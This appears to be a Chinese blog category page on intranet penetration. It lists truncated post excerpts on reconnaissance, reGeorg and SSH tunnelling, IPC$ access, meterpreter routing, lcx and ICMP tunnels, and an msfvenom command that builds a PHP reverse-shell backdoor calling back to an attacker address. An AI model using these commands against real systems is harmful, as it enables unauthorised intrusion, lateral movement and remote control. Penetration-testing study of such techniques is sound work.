随笔分类 - 内网渗透
内网渗透的相关知识
摘要:一 收集本机信息 1.1 手动收集信息 查询网络配置信息 ipconfig /all ifconfig 查询操作系统及软件的信息 查询操作系统和版本信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"systeminfo | findstr
阅读全文
摘要:HTTP和HTTPSreGeorg将脚本文件上传到目标服务器中,使用kali访问上传到服务器的tunnel文件。然后利用reGeorgSocksProxy.py脚本监听本地的9999端口,就可以成功建立一个通信链路。 python reGeorgSocksProxy.py -u http://1.1
阅读全文
摘要:本地转发环境情况:web服务器ip:192.168.2.160vps:192.168.2.181域控:1.1.1.2以web服务器为跳板,将域控服务器的3389映射到vps的1153端口,再访问vps的1153,就可以访问域控的3389了。在vps执行如下命令:ssh -CfNg -L 1153:1
阅读全文
摘要:IPC 建立IPC net use \\1.1.1.2\ipc$ "密码" /user:administratornet use 可以查看状态 IPC的利用条件 使用windows自带工具获取远程主机信息 dir命令 tasklist 命令 计划任务 at命令主要工作在winserver2008之前
阅读全文
摘要:当我们在渗透中已经拿到shell和meterpreter,我们想要继续渗透内网,需要先获取目标内网的相关信息, run get_local_subnets 可以看到该主机处于什么网段。 如果我们不添加探测出的网段路由的话,是探测不到这网段其他主机的。 以下是手动添加到达192.168.11.0和19
阅读全文
摘要:PowerCat可以说是nc的PowerShell版本。可以通过执行命令回到本地运行,亦可以使用远程权限运行。 下载地址:https://github.com/besimorhino/powercat切换到该目录,输入:Import-Module ./powercat.ps1发现报错。输入 "Set
阅读全文
摘要:lcx用法: lcx的Linux版本为portmap、 1.内网端口转发 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.5
阅读全文
摘要:官方下载链接:http://freshmeat.sourceforge.net/projects/ptunnel/ 解压一下 tar -zxf PingTunnel-0.72.tar.gz 安装 make&&make install 提示我们缺少pcap包,那我们安装一下 wget http://w
阅读全文
摘要:下载地址: https://github.com/inquisb/icmpsh#usage kali下载 git clone https://github.com/inquisb/icmpsh.git 安装依赖包 apt-get install python-impacket 关闭本地ICMP的应答
阅读全文
摘要:python -m SimpleHTTPServer 默认的端口号是8000, 服务器根目录就是运行python命令的工作目录 如果是python3版本: 则试一下命令: python -m http.server 用http://127.0.0.1:8000即可访问目录下内容 服务器关闭:1) d
阅读全文
摘要:一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下as
阅读全文
摘要:基本信息 作 者: licong 创建时间: 2019年11月11日 15:29 标 签: APT攻击 | Kill Chain 描述 基本信息 作者:licong 环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为
阅读全文
摘要:ICMP协议 ping ip TCP协议 nc ip port HTTP协议 curl ip:port DNS协议 nslookup www.baidu.com vps-ip dig @vps-ip www.baidu.com
阅读全文
摘要:内网知识概念 工作组 域 这里面包括域、域控制器(DC)、单域、父域和子域、域树、域森林、DNS域名服务器、 活动目录(AD) 主要功能:账号集中管理、软件集中管理、环境集中管理、增强安全性、更可靠。 AD和DC的区别 内网的一个计算机装了AD就成了DC 安全域的划分 域中计算机的分类。 域控制器
阅读全文

浙公网安备 33010602011771号